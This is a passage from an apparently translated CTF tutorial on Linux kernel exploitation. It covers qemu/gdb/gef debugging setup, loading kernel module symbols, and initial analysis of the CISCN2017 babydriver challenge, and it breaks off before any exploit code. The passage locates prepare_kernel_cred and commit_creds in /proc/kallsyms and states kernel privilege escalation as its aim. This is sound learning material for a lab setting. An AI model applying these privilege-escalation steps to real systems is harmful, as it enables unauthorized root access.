prepare_kernel_cred  /proc/kallsyms</span><br><span class="line">grep commit_creds  /proc/kallsyms</span><br><span class="line">grep ko_test_init  /proc/kallsyms</span><br></pre></td></tr></table></figure><blockquote><p>Pitfall 1: I originally wrote the following shell script:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Other setup</span></span><br><span class="line">[...]</span><br><span class="line"><span class="comment"># Start qemu in the **background**</span></span><br><span class="line">qemu-system-x86_64 [other args] &amp;</span><br><span class="line"><span class="comment"># Open GDB directly in the current terminal</span></span><br><span class="line">gdb -q -ex <span class="string">&quot;target remote localhost:1234&quot;</span></span><br></pre></td></tr></table></figure><p>When running this script, however, pressing Ctrl+C inside GDB delivered SIGINT to qemu and killed it outright instead of pausing the kernel running inside. gdb therefore has to be started in a different terminal for Ctrl+C to be handled properly.</p><p>The corrected script looks like this:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Other setup</span></span><br><span class="line">[...]</span><br><span class="line"><span class="comment"># Start qemu in the **background**</span></span><br><span class="line">qemu-system-x86_64 [other args] &amp;</span><br><span class="line"><span class="comment"># Open a new terminal and start GDB in it</span></span><br><span class="line">gnome-terminal -e <span class="string">&#x27;gdb -q -ex &quot;target remote localhost:1234&quot;&#x27;</span></span><br></pre></td></tr></table></figure></blockquote><blockquote><p>Pitfall 2: with the gef plugin for gdb, it is best not to connect with the plain <code>target remote 
localhost:1234</code> command (which needs no root privileges); doing so produces the following error:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">gef➤  target remote localhost:1234</span><br><span class="line">Remote debugging using localhost:1234</span><br><span class="line">warning: No executable has been specified and target does not support</span><br><span class="line">determining executable automatically.  Try using the <span class="string">&quot;file&quot;</span> <span class="built_in">command</span>.</span><br><span class="line">0x000000000000fff0 <span class="keyword">in</span> ?? ()</span><br><span class="line">[ Legend: Modified register | Code | Heap | Stack | String ]</span><br><span class="line">──────────────────────────────────── registers ────────────────────────────────────</span><br><span class="line">[!] 
Command <span class="string">&#x27;context&#x27;</span> failed to execute properly, reason: <span class="string">&#x27;NoneType&#x27;</span> object has no attribute <span class="string">&#x27;all_registers&#x27;</span></span><br></pre></td></tr></table></figure><p>Instead, connect to qemu with the <code>gef-remote</code> command, which works better (but requires root privileges):</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># The architecture must be set beforehand</span></span><br><span class="line"><span class="built_in">set</span> architecture i386:x86-64</span><br><span class="line">gef-remote --qemu-mode localhost:1234</span><br></pre></td></tr></table></figure><p>Pitfall 3: if gef reports the following error when qemu stops at <code>start_kernel</code>:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[!] Command <span class="string">&#x27;context&#x27;</span> failed to execute properly, reason: max() arg is an empty sequence</span><br></pre></td></tr></table></figure><p>simply single-step once with <code>ni</code>.</p></blockquote><h4 id="b-attach-drivers">b. 
attach drivers</h4><h5 id="1-常规步骤">1) General steps</h5><p>First, load the target driver into the kernel:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">insmod &lt;driver_module_name&gt;</span><br></pre></td></tr></table></figure><p>Next, use the following commands inside qemu to find the load base address of the driver&#x27;s text section:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># List the loaded drivers</span></span><br><span class="line">lsmod</span><br><span class="line"><span class="comment"># Get the base address the driver was loaded at</span></span><br><span class="line">grep &lt;target_module_name&gt; /proc/modules </span><br></pre></td></tr></table></figure><p>In the gdb window, enter the following command to load the debug symbols:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add-symbol-file mydrivers/ko_test.ko &lt;ko_test_base_addr&gt; [-s &lt;section1_name&gt; &lt;section1_addr&gt;] ...</span><br></pre></td></tr></table></figure><blockquote><p>Note: unlike with vmlinux, when loading kernel module symbols with add-symbol-file <strong>you must specify the base address of the module&#x27;s text section</strong>.</p><p>The kernel itself lives at a well-known virtual address (the same as the load address in the vmlinux ELF file), whereas a kernel module is only a relocatable object file with no valid load address of its own. Its addresses are fixed only once the kernel&#x27;s module loader has allocated memory and decided where to place each loadable section. Before the module is loaded we therefore cannot know where in memory it will end up, so when loading the symbol file into gdb we must explicitly specify the address of as many sections as possible.</p><p>Keep in mind that <strong>the more section addresses you specify when loading the symbol file, the better</strong>. If only the base address of the .text section is given, breakpoints on functions may fail to trigger, which makes debugging very painful.</p></blockquote><p>How do you find the load address of each section of the target kernel module? Run the following command:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep <span class="string">&quot;0x&quot;</span> /sys/module/ko_test/sections/.*</span><br></pre></td></tr></table></figure><h5 id="2-例子">2) Example</h5><p>A small example: the steps for debugging ko_test.ko are as follows:</p><ul><li><p>First, in qemu&#x27;s kernel shell 
run the following commands</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># First load ko_test into the kernel</span></span><br><span class="line">insmod /ko_test.ko</span><br><span class="line"><span class="comment"># Show the addresses ko_test was loaded at</span></span><br><span class="line">grep ko_test /proc/modules</span><br><span class="line">grep <span class="string">&quot;0x&quot;</span> /sys/module/ko_test/sections/.*</span><br></pre></td></tr></table></figure><p>The output looks like this:</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211003135526278.png" alt="image-20211003135526278"></p></li><li><p>Note down these addresses, switch to gdb, press Ctrl+C to pause the kernel, and enter the following commands:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Load the symbols at the recorded addresses</span></span><br><span class="line">add-symbol-file mydrivers/ko_test.ko  0xffffffffc0002000 \</span><br><span class="line">                    -s .rodata.str1.1 0xffffffffc000304c \</span><br><span class="line">                    -s .symtab        0xffffffffc0007000 \</span><br><span class="line">                    -s .text.unlikely 0xffffffffc0002000</span><br><span class="line"><span class="comment"># Set breakpoints</span></span><br><span class="line">b ko_test_init</span><br><span class="line">b ko_test_exit</span><br><span class="line"><span class="comment"># Resume execution</span></span><br><span class="line"><span 
class="built_in">continue</span></span><br></pre></td></tr></table></figure><p><img src="/2021/10/kernel_pwn_introduction/image-20211003140102062.png" alt="image-20211003140102062"></p></li><li><p>Finally, go back to qemu and run the following command in the kernel shell:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Unload ko_test</span></span><br><span class="line">rmmod ko_test</span><br></pre></td></tr></table></figure><p>gdb now stops inside ko_test_exit:</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211003140345483.png" alt="image-20211003140345483"></p><p>If ko_test is loaded again after it has been unloaded,</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">insmod /ko_test.ko</span><br></pre></td></tr></table></figure><p>gdb immediately stops inside ko_test_init:</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211003140435218.png" alt="image-20211003140435218"></p><blockquote><p>This is probably because nokaslr is set, so the same driver gets the same base address every time it is loaded.</p></blockquote></li></ul><p>The method above for debugging a kernel module&#x27;s init function is really a small trick: it relies on the fact that, <strong>with nokaslr, reloading the same driver yields the same base address</strong>. The most reliable way to debug an init function, however, is to follow the control flow of <code>do_init_module</code> and obtain the base address from there. The steps are as follows:</p><blockquote><p>We trace <code>do_init_module</code> because it is called from <code>load_module</code>. After <code>load_module</code> has done the heavy lifting of loading the module into memory, it finally enters <code>do_init_module</code>, which runs the module&#x27;s init function and then performs the cleanup work.</p><p><code>load_module</code> is in turn called by the <code>init_module</code> system call.</p></blockquote><ul><li><p>First let the kernel run freely. Once it has finished booting and the shell prompt appears, press Ctrl+C in gdb to pause it and set a breakpoint on <code>do_init_module</code>. The first half of this function executes the kernel module&#x27;s init function:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * This is where the real work happens.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Keep it uninlined to provide a reliable breakpoint target, e.g. for the gdb</span></span><br><span class="line"><span class="comment"> * helper command &#x27;lx-symbols&#x27;.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> noinline <span class="type">int</span> <span class="title">do_init_module</span><span class="params">(<span class="keyword">struct</span> <span class="keyword">module</span> *mod)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  [...]</span><br><span class="line">  <span class="comment">/* Start the module */</span></span><br><span class="line">  <span class="keyword">if</span> (mod-&gt;init != <span class="literal">NULL</span>)</span><br><span class="line">    ret = <span class="built_in">do_one_initcall</span>(mod-&gt;init);   <span class="comment">// &lt;- ko_test_init is executed here</span></span><br><span class="line">  <span class="keyword">if</span> (ret &lt; <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">goto</span> fail_free_freeinit;</span><br><span class="line">  &#125;</span><br><span class="line">  [...]</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Enter <code>continue</code> in gdb to let the kernel run again. Then run <code>insmod /ko_test.ko</code> in the kernel shell to load the module; gdb stops at the breakpoint. Inspecting the <code>mod-&gt;init</code> member in gdb gives the start address of the kernel module&#x27;s init function.</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211003143313234.png" alt="image-20211003143313234"></p></li><li><p>To see the addresses of all sections of the current kernel module, enter the following commands in gdb:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Number of sections in the current module</span></span><br><span class="line">p mod-&gt;sect_attrs-&gt;nsections</span><br><span class="line"><span class="comment"># Information about the third section (index 2)</span></span><br><span class="line">p mod-&gt;sect_attrs-&gt;attrs[2]</span><br></pre></td></tr></table></figure><p><img src="/2021/10/kernel_pwn_introduction/image-20211003144520767.png" alt="image-20211003144520767"></p><p>With the names and base addresses of all sections of the module in hand, the symbol file can be loaded as described earlier.</p></li></ul><h4 id="c-启动脚本">c. 
Launch script</h4><blockquote><p>Setting up the environment is about as tedious as it gets, but that is all of it for now :)</p></blockquote><p>I combined the launch commands into a single shell script so that everything starts with one command:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#! 
/bin/bash</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Check that we are running as root; gef-remote --qemu-mode needs elevated privileges</span></span><br><span class="line">user=$(<span class="built_in">env</span> | grep <span class="string">&quot;^USER=&quot;</span> | <span class="built_in">cut</span> -d <span class="string">&quot;=&quot;</span> -f 2)</span><br><span class="line"><span class="keyword">if</span> [ <span class="string">&quot;<span class="variable">$user</span>&quot;</span> != <span class="string">&quot;root&quot;</span>  ]</span><br><span class="line">  <span class="keyword">then</span></span><br><span class="line">    <span class="built_in">echo</span> <span class="string">&quot;Please run this script as root&quot;</span></span><br><span class="line">    <span class="built_in">exit</span></span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Copy the driver into the rootfs</span></span><br><span class="line"><span class="built_in">cp</span> ./mydrivers/*.ko busybox-1.34.1/_install</span><br><span class="line"></span><br><span class="line"><span class="comment"># Build the rootfs</span></span><br><span class="line"><span class="built_in">pushd</span> busybox-1.34.1/_install</span><br><span class="line">find . 
| cpio -o --format=newc &gt; ../../rootfs.img</span><br><span class="line"><span class="built_in">popd</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Start qemu</span></span><br><span class="line">qemu-system-x86_64 \</span><br><span class="line">    -kernel ./arch/x86/boot/bzImage \</span><br><span class="line">    -initrd ./rootfs.img \</span><br><span class="line">    -append <span class="string">&quot;nokaslr&quot;</span> \</span><br><span class="line">    -s  \</span><br><span class="line">    -S&amp;</span><br><span class="line"></span><br><span class="line">    <span class="comment"># -s: equivalent to -gdb tcp::1234, opens qemu&#x27;s gdb debug port</span></span><br><span class="line">    <span class="comment"># -S: pause qemu immediately at startup</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># -nographic                # disable the QEMU graphical window</span></span><br><span class="line">    <span class="comment"># -append &quot;console=ttyS0&quot;   # together with -nographic, the boot output goes to the current terminal</span></span><br><span class="line"></span><br><span class="line">gnome-terminal -e <span class="string">&#x27;gdb -x mygdbinit&#x27;</span></span><br></pre></td></tr></table></figure><p>The contents of mygdbinit are as follows:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> architecture i386:x86-64</span><br><span class="line">add-symbol-file vmlinux</span><br><span class="line">gef-remote --qemu-mode localhost:1234</span><br><span class="line"></span><br><span class="line">b start_kernel</span><br><span class="line">c</span><br></pre></td></tr></table></figure><h2 id="四、小试牛刀">IV. A First Challenge</h2><blockquote><p>I picked CISCN2017_babydriver as my first kernel pwn challenge, because there is plenty of material about it online, which makes it easy to learn from.</p></blockquote><h3 
id="1-题目附件">1. Challenge files</h3><p>The challenge files can be downloaded <a href="https://github.com/ctf-wiki/ctf-challenges/blob/master/pwn/kernel/CISCN2017-babydriver/babydriver.tar">here</a>.</p><p>The challenge provides three files:</p><ul><li>boot.sh: the launch script</li><li>bzImage: the kernel boot image</li><li>rootfs.cpio: the root file system image</li></ul><h3 id="2-尝试执行">2. First run</h3><p>To begin with, simply extract <code>babydriver.tar</code> and run the launch script:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Extract</span></span><br><span class="line"><span class="built_in">mkdir</span> babydriver</span><br><span class="line">tar -xf babydriver.tar -C babydriver</span><br><span class="line"><span class="comment"># Launch</span></span><br><span class="line"><span class="built_in">cd</span> babydriver </span><br><span class="line">./boot.sh</span><br></pre></td></tr></table></figure><p>KVM, however, fails with the following error:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Could not access KVM kernel module: No such file or directory</span><br><span class="line">qemu-system-x86_64: failed to initialize kvm: No such file or directory</span><br></pre></td></tr></table></figure><p>The following command checks whether the Linux guest running in VMware supports virtualization. The output was empty, which means it is <strong>not supported</strong>.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">egrep <span class="string">&#x27;^flags.*(vmx|svm)&#x27;</span> /proc/cpuinfo</span><br></pre></td></tr></table></figure><p>I checked the Virtualization Settings of the physical machine, and everything was already enabled. I then checked the CPU configuration in VMware and found that <code>Virtualize Intel VT-x/EPT or AMD-V/RVI</code> was not ticked.</p><p>After ticking it and restarting the Linux VM, VMware reported <code>此平台不支持虚拟化的 Intel 
VT-x/EPT</code>…</p><p>Some searching showed that Hyper-V had not been fully disabled. To disable it completely:</p><ul><li><p>In Control Panel, open Programs, then "Turn Windows features on or off", uncheck Hyper-V, and confirm.</p></li><li><p>Open cmd <strong>as administrator</strong> and run <code>bcdedit /set hypervisorlaunchtype off</code></p><blockquote><p>To re-enable it later, run <code>bcdedit /set hypervisorlaunchtype auto</code></p></blockquote></li><li><p>Reboot the machine.</p></li></ul><p>After that, KVM works normally inside the Linux guest running in VMware.</p><h3 id="3-题目分析">3. Challenge analysis</h3><h4 id="a-目的">a. Goal</h4><ul><li><p>The <code>/init</code> file in the root directory shows that this challenge requires <strong>kernel privilege escalation</strong>: the flag can only be read after gaining root.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line"> </span><br><span class="line">mount -t proc none /proc</span><br><span class="line">mount -t sysfs none /sys</span><br><span class="line">mount -t devtmpfs devtmpfs /dev</span><br><span class="line"><span class="built_in">chown</span> root:root flag                      <span class="comment"># flag is made readable by root only</span></span><br><span class="line"><span class="built_in">chmod</span> 400 flag</span><br><span class="line"><span class="built_in">exec</span> 0&lt;/dev/console</span><br><span class="line"><span class="built_in">exec</span> 1&gt;/dev/console</span><br><span class="line"><span class="built_in">exec</span> 2&gt;/dev/console</span><br><span 
class="line"></span><br><span class="line">insmod /lib/modules/4.4.72/babydriver.ko   <span class="comment"># load the vulnerable driver</span></span><br><span class="line"><span class="built_in">chmod</span> 777 /dev/babydev</span><br><span class="line"><span class="built_in">echo</span> -e <span class="string">&quot;\nBoot took <span class="subst">$(cut -d&#x27; &#x27; -f1 /proc/uptime)</span> seconds\n&quot;</span></span><br><span class="line">setsid cttyhack setuidgid 1000 sh</span><br><span class="line"></span><br><span class="line">umount /proc</span><br><span class="line">umount /sys</span><br><span class="line">poweroff -d 0  -f</span><br></pre></td></tr></table></figure></li></ul><h4 id="b-获取目标内核模块">b. Extracting the target kernel module</h4><blockquote><p>Before escalating privileges, we first need to pull out the driver that gets loaded into the kernel; it is very likely the vulnerable one.</p></blockquote><p>First, check the format of rootfs.cpio with the file command:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ file rootfs.cpio                 </span><br><span class="line">rootfs.cpio: gzip compressed data, last modified: Tue Jul  4 08:39:15   2017, max compression, from Unix, original size modulo 2^32 2844672</span><br></pre></td></tr></table></figure><p>The file is gzip-compressed, so it has to be renamed first; otherwise gunzip rejects it because it does not recognize the suffix. After that, decompress it with gunzip and unpack the cpio archive:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mv</span> rootfs.cpio rootfs.cpio.gz</span><br><span class="line">gunzip rootfs.cpio.gz</span><br></pre></td></tr></table></figure><p>After decompression the file is a regular cpio archive:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ file rootfs.cpio </span><br><span class="line">rootfs.cpio: ASCII cpio archive (SVR4 with no 
CRC)</span><br></pre></td></tr></table></figure><p>Unpack the cpio archive in the usual way:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cpio -idmv &lt; rootfs.cpio</span><br></pre></td></tr></table></figure><p>Once unpacked, the target driver can be found at <code>/lib/modules/4.4.72/babydriver.ko</code> inside the extracted tree.</p><h4 id="c-查看保护">c. Checking the protections</h4><p>First, the protections on the driver itself:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ checksec babydriver.ko</span><br><span class="line">[*] <span class="string">&#x27;/usr/class/kernel_pwn/CISCN2017-babydriver/babydriver/babydriver.ko&#x27;</span></span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    No RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x0)</span><br></pre></td></tr></table></figure><p>Only NX is enabled here.</p><p>Next, the qemu launch parameters show that SMEP is enabled.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"></span><br><span class="line">qemu-system-x86_64 \</span><br><span class="line">    -initrd rootfs.cpio \</span><br><span class="line">    -kernel 
bzImage \</span><br><span class="line">    -append <span class="string">&#x27;console=ttyS0 root=/dev/ram oops=panic panic=1&#x27;</span> \</span><br><span class="line">    -enable-kvm \</span><br><span class="line">    -monitor /dev/null \</span><br><span class="line">    -m 64M \</span><br><span class="line">    --nographic  \</span><br><span class="line">    -smp cores=1,threads=1 \</span><br><span class="line">    -cpu kvm64,+smep      <span class="comment"># &lt;- +smep enables SMEP</span></span><br></pre></td></tr></table></figure><blockquote><p>SMEP (Supervisor Mode Execution Prevention): <strong>prevents the CPU from executing user-space code while it is in ring 0</strong>.</p><p>A closely related protection is SMAP (Supervisor Mode Access Prevention): it prevents the CPU from accessing user-space data while it is in ring 0.</p></blockquote><p>Note that <strong>KASLR is not enabled</strong>.</p><h4 id="d-代码分析">d. Code analysis</h4><blockquote><p>Since this is my first kernel challenge, the code deserves a careful read. We go through the driver's functions one by one.</p></blockquote><h5 id="1-babydriver-init">1) babydriver_init</h5><h6 id="1-1-关键代码">1.1) Key code</h6><p>Here is the code. Focus on the parts inside the red boxes (the rest is error handling).</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211004162419135.png" alt="image-20211004162419135"></p><p>Trimmed down, the key code is:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">alloc_chrdev_region</span>(&amp;babydev_no, <span class="number">0</span>, <span class="number">1</span>, <span class="string">&quot;babydev&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="built_in">cdev_init</span>(&amp;cdev_0, &amp;fops);</span><br><span class="line">cdev_<span class="number">0.</span>owner = &amp;_this_module;</span><br><span 
class="line"></span><br><span class="line"><span class="built_in">cdev_add</span>(&amp;cdev_0, babydev_no, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">babydev_class = _class_create(&amp;_this_module, <span class="string">&quot;babydev&quot;</span>, &amp;babydev_no);</span><br><span class="line"></span><br><span class="line"><span class="built_in">device_create</span>(babydev_class, <span class="number">0</span>, babydev_no, <span class="number">0</span>, <span class="string">&quot;babydev&quot;</span>);</span><br></pre></td></tr></table></figure><p>Before explaining the code above, let us briefly cover some background on <strong>device files</strong>.</p><h6 id="1-2-设备号">1.2) Device numbers</h6><p>Linux devices fall into three broad classes:</p><ul><li>Character devices (char device), e.g. the console</li><li>Block devices (block device), e.g. the disks that hold filesystems</li><li>Network devices (network device), e.g. network cards</li></ul><p>Character and block devices are accessed through device files, which usually live under /dev (network interfaces have no such node). The first character of each entry printed by <code>ls -l</code> gives the file type:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># c: character device</span></span><br><span class="line">crw-rw-rw-   1 root <span class="built_in">tty</span>       5,   0 Oct  3 15:03 0</span><br><span class="line"><span class="comment"># l: symbolic link</span></span><br><span class="line">lrwxrwxrwx   1 root root          15 Oct  2 23:43 stdout -&gt; /proc/self/fd/1</span><br><span class="line"><span class="comment"># -: regular file</span></span><br><span class="line">-rw-rw-r--  1 Kiprey Kiprey  203792 Jun 16  2017 babydriver.ko</span><br></pre></td></tr></table></figure><p>In a <strong>device file entry</strong>, two comma-separated numbers appear just before the last-modified date, such as the pair shown above: <code>5, 
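0</code>. (For a regular file, this column shows the <strong>file size</strong>.) In a <strong>device file entry</strong>, a pair such as <code>5,0</code> gives the device's <strong>major number</strong> and <strong>minor number</strong>.</p><p>Traditionally, the <strong>major number</strong> identifies the <strong>driver</strong> associated with the device. For example, <code>/dev/null</code> and <code>/dev/zero</code> are both managed by driver 1, while the serial terminals (ttyX, ttySX) are managed by driver 4. Modern Linux kernels <strong>allow multiple drivers to share a major number</strong>, but most devices are still organized on a <strong>one major number per driver</strong> basis.</p><p>The kernel <strong>uses the minor number to determine exactly which device is being referred to</strong>. That is its only role; the kernel knows nothing more about any particular minor number.</p><p>The major and minor numbers are stored together in the type <code>dev_t</code>, which is actually a <code>u32</code>: the upper 12 bits hold the major number and the lower 20 bits hold the minor number.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> u32 <span class="type">__kernel_dev_t</span>;</span><br><span class="line"><span class="keyword">typedef</span> <span class="type">__kernel_dev_t</span>    <span class="type">dev_t</span>;</span><br></pre></td></tr></table></figure><p>When a driver needs the major or minor number, it is best not to do the bit manipulation by hand but to use the macros from the <code>&lt;linux/kdev_t.h&gt;</code> header:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> MINORBITS     20                                        <span class="comment">// number of bits used for the minor number</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MINORMASK     ((1U &lt;&lt; MINORBITS) - 1)</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MAJOR(dev)    ((unsigned int) ((dev) &gt;&gt; MINORBITS))    <span class="comment">// extract the major number</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MINOR(dev)    ((unsigned int) ((dev) &amp; MINORMASK))      <span class="comment">// extract the minor number</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MKDEV(ma,mi)  (((ma) &lt;&lt; MINORBITS) | (mi))              <span class="comment">// build a dev_t from a major and a minor number</span></span></span><br></pre></td></tr></table></figure><p>That is enough about device files for now; back to the challenge.</p><p>First, babydriver_init calls the <code>alloc_chrdev_region</code> 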
function. Its declaration is:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * alloc_chrdev_region() - register a range of char device numbers</span></span><br><span class="line"><span class="comment"> * @dev: output parameter for first assigned number</span></span><br><span class="line"><span class="comment"> * @baseminor: first of the requested range of minor numbers</span></span><br><span class="line"><span class="comment"> * @count: the number of minor numbers required</span></span><br><span class="line"><span class="comment"> * @name: the name of the associated device or driver</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Allocates a range of char device numbers.  The major number will be</span></span><br><span class="line"><span class="comment"> * chosen dynamically, and returned (along with the first 